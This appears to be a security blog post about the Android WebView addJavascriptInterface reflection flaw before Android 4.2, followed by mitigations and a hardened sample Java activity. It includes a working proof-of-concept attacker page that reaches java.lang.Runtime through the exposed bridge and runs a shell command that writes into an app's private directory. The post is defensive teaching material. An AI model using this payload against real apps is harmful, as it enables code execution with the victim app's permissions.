Calling addJavascriptInterface exposes a Java object to the JavaScript running inside a WebView, so that page script can invoke the object's methods directly. Before Android 4.2 every public method of that object was reachable, including the methods it inherits from java.lang.Object. Any untrusted content loaded in the WebView can therefore call getClass() on the bridge, use reflection to walk from there to any class the app can load, and invoke whatever it finds. In the example below the page reaches java.lang.Runtime through the bridge and runs a shell command with the app's UID and permissions, which is enough to overwrite files in the application's private data directory.
Throughout the example, "androidbridge" is the name under which the app's JSInterface object is injected into the WebView.
In the code below, androidbridge is the exposed JavaScript bridge.
(PS: I shall fix the formatting issues and beautify the code in some time.)
The attacker-controlled page loaded into the WebView:

<!DOCTYPE html>
<html>
<head>
<meta content="text/html;charset=UTF-8" http-equiv="content-type">
<script>
// Walk from the exposed bridge object to java.lang.Runtime via reflection
// and execute a shell command with the app's permissions.
function execute(cmdArgs) {
    var runtime = androidbridge.getClass()
        .forName("java.lang.Runtime")
        .getMethod("getRuntime", null)
        .invoke(null, null);
    runtime.exec(cmdArgs);
    return 1;
}
var maliciousContents = "isecPartners";
// Write into the app's private directory, which the page could never
// reach on its own.
execute(["/system/bin/sh", "-c",
         "echo '" + maliciousContents + "' > /data/data/com.goodcompany.private.directory/evilFile"]);
</script>
</head>
<body>No Content here</body>
</html>

The app side, which injects the bridge object into the WebView:

webView.addJavascriptInterface(new JSInterface(this), "androidbridge");
Solution: Beginning in Android 4.2 (API level 17), only public methods explicitly annotated with @JavascriptInterface are accessible to hosted JavaScript. This restriction is enforced only when the application's targetSdkVersion is 17 or higher, so set targetSdkVersion to 17 or higher and annotate exactly the methods the page is meant to call. getClass() is then no longer reachable from the page, which removes the reflection path used above. Note that the annotation does nothing on devices running versions older than 4.2: if minSdkVersion is below 17, the app remains exploitable on those devices unless it avoids calling addJavascriptInterface there or never loads untrusted content into the WebView.
Another mitigation is to keep the WebView from navigating outside a whitelist of trusted domains: override shouldOverrideUrlLoading in a WebViewClient, check whether the URL's host is allowed, and if it is not, open the URL in the default Android browser via an Intent rather than in the WebView, so untrusted pages never run with the bridge attached. Load the whitelisted site over HTTPS only; over plain HTTP an attacker on the network can inject script into a trusted page and reach the bridge anyway.
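Both mitigations together, as an added example written for this post rather than code from the original: the bridge carries @JavascriptInterface on the single method the page may call, the WebViewClient keeps navigation on a whitelisted HTTPS host and hands everything else to the system browser, and the bridge is not installed at all on devices below Android 4.2, where the annotation is not enforced. It assumes the manifest declares targetSdkVersion 17 or higher (<uses-sdk android:targetSdkVersion="17" />); the host www.goodcompany.com, the class and method names and the start URL are placeholders.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class SafeBridgeActivity extends Activity {

    // Assumption: the only host whose pages may run inside this WebView.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("www.goodcompany.com"));

    // Assumption: a minimal bridge. With targetSdkVersion >= 17, only methods
    // carrying @JavascriptInterface are callable from page JavaScript, so
    // getClass() (and with it the reflection path to Runtime.exec) is gone.
    static class JSInterface {
        private final Activity activity;

        JSInterface(Activity activity) {
            this.activity = activity;
        }

        @JavascriptInterface
        public String getAppVersion() {   // assumed method name
            return "1.0";
        }

        // No annotation: not reachable from JavaScript on API 17 and above.
        public void finishActivity() {
            activity.finish();
        }
    }

    static class WhitelistClient extends WebViewClient {
        // Pre-API-24 signature, matching the era of the post.
        @Override
        public boolean shouldOverrideUrlLoading(WebView view, String url) {
            Uri uri = Uri.parse(url);
            String host = uri.getHost();
            boolean trusted = "https".equals(uri.getScheme())
                    && host != null
                    && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
            if (trusted) {
                return false;   // let the WebView load it
            }
            // Anything else goes to the system browser, where no bridge exists.
            view.getContext().startActivity(new Intent(Intent.ACTION_VIEW, uri));
            return true;
        }
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);
        webView.getSettings().setJavaScriptEnabled(true);
        webView.setWebViewClient(new WhitelistClient());

        // The annotation is only enforced on Android 4.2+ (API 17). On older
        // devices every public method, including getClass(), is still exposed,
        // so do not install the bridge there at all.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new JSInterface(this), "androidbridge");
        }
        webView.loadUrl("https://www.goodcompany.com/app/");   // assumed start URL
    }
}
```

The whitelist is only as strong as the trusted site itself: any script a whitelisted page pulls in from another origin runs with that page's origin and sees the bridge, and shouldOverrideUrlLoading is not invoked for POST navigations or for subresource loads, so it is a navigation filter, not a sandbox. The HTTPS check matters because a plain-HTTP load of the trusted host can be rewritten on the wire.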
References:
[1] http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29
[2] http://android-developers.blogspot.com/2013/02/security-enhancements-in-jelly-bean.html